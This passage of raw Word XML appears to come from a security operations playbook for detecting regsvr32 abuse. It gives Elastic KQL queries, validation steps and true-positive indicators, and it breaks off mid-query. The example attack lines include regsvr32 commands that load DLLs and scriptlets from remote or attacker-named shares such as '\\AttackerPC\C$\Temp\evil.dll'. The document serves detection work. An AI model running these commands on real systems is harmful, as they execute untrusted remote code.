    <w:p w14:paraId="2B15659E" w14:textId="59A35D4B" w:rsidR="006A76C3" w:rsidRPr="00B46523" w:rsidRDefault="006A76C3" w:rsidP="00C44568">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145E74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unsigned parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B433A" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645EFF34" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="0076213B">
        <w:t>DLL Unsigned</w:t>
      </w:r>
      <w:r>
        <w:t>/No signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7166C0" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine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387FAD11" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="006C173F" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C173F">
        <w:t>regsvr32.exe C:\Temp\unsigned_hacker_tool.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F2C6F" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="006C173F" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C173F">
        <w:t xml:space="preserve">Any execution where the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C173F">
        <w:t>dll.code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C173F">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C173F">
        <w:t>signature.</w:t>
      </w:r>
      <w:r>
        <w:t>exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C173F">
        <w:t xml:space="preserve"> field is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A84AAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F86E32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2.7.1 Query KQL Elastic XDR</w:t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1762E465" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A86621" w14:textId="193FDD8D" w:rsidR="0071548A" w:rsidRDefault="00C47F61" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197190">
              <w:t>process.name:</w:t>
            </w:r>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t xml:space="preserve"> regsvr32.exe AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t>event.category</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t xml:space="preserve"> : library</w:t>
            </w:r>
            <w:r w:rsidR="0071548A">
              <w:t xml:space="preserve"> AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t>dll.code</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00197190">
              <w:t>signature.exists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0071548A" w:rsidRPr="00863DFD">
              <w:t>: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47E0B974" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/NiwVK</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13376AEA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2.7.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E422814" w14:textId="44785566" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00E53403">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0148">
        <w:t xml:space="preserve">Inspect </w:t>
      </w:r>
      <w:r w:rsidR="00B2219C">
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidR="005E13A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0148">
        <w:t xml:space="preserve">file location </w:t>
      </w:r>
      <w:r w:rsidR="00B2219C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B2219C">
        <w:t>dll.path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B2219C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B31B9" w14:textId="07C07A70" w:rsidR="00B2219C" w:rsidRPr="00E53403" w:rsidRDefault="00B2219C" w:rsidP="00E53403">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check network activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0863BB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2.7.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D82B4" w14:textId="77777777" w:rsidR="00B2219C" w:rsidRDefault="00B2219C" w:rsidP="00B2219C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2219C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL not in legitimate system directories (System32, SysWOW64, Program Files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CED60" w14:textId="298E80C9" w:rsidR="00B2219C" w:rsidRPr="00B2219C" w:rsidRDefault="00787593" w:rsidP="00B2219C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N</w:t>
      </w:r>
      <w:r w:rsidR="00B2219C" w:rsidRPr="00B2219C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">etwork activity within 30 seconds </w:t>
      </w:r>
      <w:r w:rsidR="00E36720">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidR="00B2219C" w:rsidRPr="00B2219C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0A7A2" w14:textId="77777777" w:rsidR="00D974D0" w:rsidRPr="00D974D0" w:rsidRDefault="00D974D0" w:rsidP="00D974D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421AE4A8" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="005A301E">
        <w:t>Suspicious Child Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2D4E1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine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796D7907" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="002B422D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B422D">
        <w:t>regsvr32.exe -&gt; starts cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8F1B5" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="002B422D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B422D">
        <w:t>regsvr32.exe -&gt; starts powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDA9CE" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="002B422D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22984A2F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2.8.1 Query KQL Elastic XDR</w:t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31A425A2" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4762BAC6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7FD9">
              <w:t>process.parent.name: regsvr32.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01447A51" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/5VASN</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B152D53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2.8.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343F5CF1" w14:textId="7BEF2522" w:rsidR="00845735" w:rsidRDefault="00500080" w:rsidP="00500080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0088">
        <w:t>Inspect</w:t>
      </w:r>
      <w:r w:rsidR="009F5DCD">
        <w:t xml:space="preserve"> child</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0088">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1489">
        <w:t xml:space="preserve">process and its </w:t>
      </w:r>
      <w:r w:rsidR="00845735" w:rsidRPr="000A0088">
        <w:t xml:space="preserve">command line for </w:t>
      </w:r>
      <w:r w:rsidR="00845735">
        <w:t>command/</w:t>
      </w:r>
      <w:r w:rsidR="00845735" w:rsidRPr="000A0088">
        <w:t>payload execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40107242" w14:textId="6A83B1AC" w:rsidR="00340CA9" w:rsidRDefault="00340CA9" w:rsidP="00340CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inspect</w:t>
      </w:r>
      <w:r w:rsidR="00BF7DE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF7DE5" w:rsidRPr="00BF7DE5">
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidR="00BF7DE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0029621A">
        <w:t xml:space="preserve">process </w:t>
      </w:r>
      <w:r w:rsidR="00BF7DE5">
        <w:t xml:space="preserve">and parent process </w:t>
      </w:r>
      <w:r w:rsidR="00E130C0">
        <w:t xml:space="preserve">execution </w:t>
      </w:r>
      <w:r w:rsidR="0029621A">
        <w:t xml:space="preserve">command line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07969055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2.8.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C9072E" w14:textId="69F56051" w:rsidR="00D557AF" w:rsidRDefault="00D557AF" w:rsidP="00D557AF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Child process has suspicious command line and has f</w:t>
      </w:r>
      <w:r w:rsidRPr="00091858">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ollow-on activity indicating payload execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A799D5" w14:textId="52833320" w:rsidR="00937DFA" w:rsidRPr="00937DFA" w:rsidRDefault="00A02FFB" w:rsidP="00937DFA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P</w:t>
      </w:r>
      <w:r w:rsidR="00EB3B41" w:rsidRPr="00EB3B41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ath NOT in any of these legitimate locations</w:t>
      </w:r>
      <w:r w:rsidR="00EB3B41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: System32, SysWOW64, </w:t>
      </w:r>
      <w:r w:rsidR="00EB3B41" w:rsidRPr="00EB3B41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>program files</w:t>
      </w:r>
      <w:r w:rsidR="00EB3B41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EB3B41" w:rsidRPr="00EB3B41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>program files (x86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE73F53" w14:textId="77777777" w:rsidR="004968E4" w:rsidRPr="00CF68B8" w:rsidRDefault="004968E4" w:rsidP="00CF68B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFB3368" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.9 Regsvr32 Unsigned/No signature</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EFEEC1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine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30A73104" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00844975" w:rsidRDefault="0071548A" w:rsidP="0071548A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C173F">
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; not signed </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6336">
        <w:t>or untrusted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19102432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2.9.1 Query KQL Elastic XDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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68DE49C2" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B495F6B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>process.name:regsvr32.exe</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t xml:space="preserve"> AND (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>process.code</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>signature.exists</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>:false</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t xml:space="preserve"> OR </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>process.code</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>signature.trusted</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>:false</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00286D83">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32C09907" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/B7fFf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21BB7D8F" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CC8C86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2.9.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234AAE64" w14:textId="4B57AF34" w:rsidR="0046327C" w:rsidRDefault="0046327C" w:rsidP="0046327C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24B47">
        <w:t xml:space="preserve">Check signature </w:t>
      </w:r>
      <w:r w:rsidR="002E568C">
        <w:t>publisher/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24B47">
        <w:t>trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237C5A6" w14:textId="477F8AD6" w:rsidR="0071548A" w:rsidRPr="00A24B47" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24B47">
        <w:t>Verify binary location</w:t>
      </w:r>
      <w:r w:rsidR="00B96F02">
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidR="00B96F02" w:rsidRPr="00B96F02">
        <w:t xml:space="preserve">ile </w:t>
      </w:r>
      <w:r w:rsidR="006A4988">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B96F02" w:rsidRPr="00B96F02">
        <w:t>ath</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24B47">
        <w:t xml:space="preserve"> (should be System32/SysWOW64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BABB05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2.9.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C00A7A" w14:textId="6A993AAB" w:rsidR="00B56574" w:rsidRPr="003B3BD7" w:rsidRDefault="0059172E" w:rsidP="003B3BD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3BD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="003B3BD7" w:rsidRPr="003B3BD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> publisher</w:t>
      </w:r>
      <w:r w:rsidR="004D4DA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA5794B" w14:textId="547692A1" w:rsidR="0071548A" w:rsidRPr="00C31740" w:rsidRDefault="00CD5F92" w:rsidP="0071548A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R</w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="00C31740">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">egsvr32 binary outside </w:t>
      </w:r>
      <w:r w:rsidR="00ED4CC2" w:rsidRPr="00ED4CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System32/SysWOW64</w:t>
      </w:r>
      <w:r w:rsidR="00CA614E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A521D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>or path mismatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F922A" w14:textId="77777777" w:rsidR="00332B6A" w:rsidRDefault="00332B6A" w:rsidP="00332B6A"/>
    <w:p w14:paraId="5AA61545" w14:textId="101C3D12" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.10 SMB Share Remote Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ACD30" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine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57EE6B19" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00C55F27" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55F27">
        <w:t xml:space="preserve">regsvr32.exe </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00C55F27">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.10.10.5\share\payload.dll</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="708F94EA" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00C55F27" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55F27">
        <w:t xml:space="preserve">regsvr32.exe /s </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00C55F27">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\AttackerPC\C$\Temp\evil.dll</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F50D85B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00C55F27" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55F27">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C55F27">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C55F27">
        <w:t>:\\192.168.1.50\Public\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C55F27">
        <w:t>test.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C55F27">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8904EE" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="003E178D" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028F118E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2.10.1 Query KQL Elastic XDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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2FE0E871" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04C20AC3" w14:textId="77777777" w:rsidR="005A5331" w:rsidRDefault="005A5331" w:rsidP="005A5331">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.name :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> regsvr32.exe </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528ABF7C" w14:textId="23237CDC" w:rsidR="0071548A" w:rsidRDefault="005A5331" w:rsidP="005A5331">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
